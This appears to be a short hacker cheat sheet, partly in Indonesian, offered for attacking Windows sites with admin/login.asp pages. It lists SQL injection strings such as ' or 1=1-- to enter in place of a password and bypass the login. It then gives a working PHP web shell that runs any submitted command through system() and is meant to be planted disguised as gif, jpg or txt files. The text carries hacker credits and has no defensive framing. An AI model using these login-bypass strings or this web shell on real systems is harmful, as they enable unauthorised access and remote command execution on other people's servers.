 |
Windows SQL injection
(site contain /admin/login.asp or just login.asp page)
Instead password use one of this string
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
Contoh file injeksi
<br><font face="Comic Sans Ms" size="2"><center>
<b>CMD</b> -System Command<br><br></center></font>
<font face="verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> PoweReD bY: <b> [= jIn dJoeXdJa=]</b><br>
<br><br>
<hr color="green" width=751px height=115px><br>
<pre><font face="arial" size"2"> <?
//$cmd="whoami;pwd;ls";
// CMD - Untuk Eksekusi Perintah pada Bug
Injeksi File(gif - jpg - txt)
if (isset($chdir)) @chdir($chdir);
ob_start ( );
system("$cmd 1> /var/tmp/root 2>&1; cat /var/tmp/root;
rm /var/tmp/root");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace
(">", ">",str_replace("<", "<", $output));
?>
</font></pre> <b> <hr color="red" width=751px
height=115px><br>
<font face="Comic Sans Ms" size="3">
<b> @==>> </b><b> "" cYbeR oBaKe "" </b><br>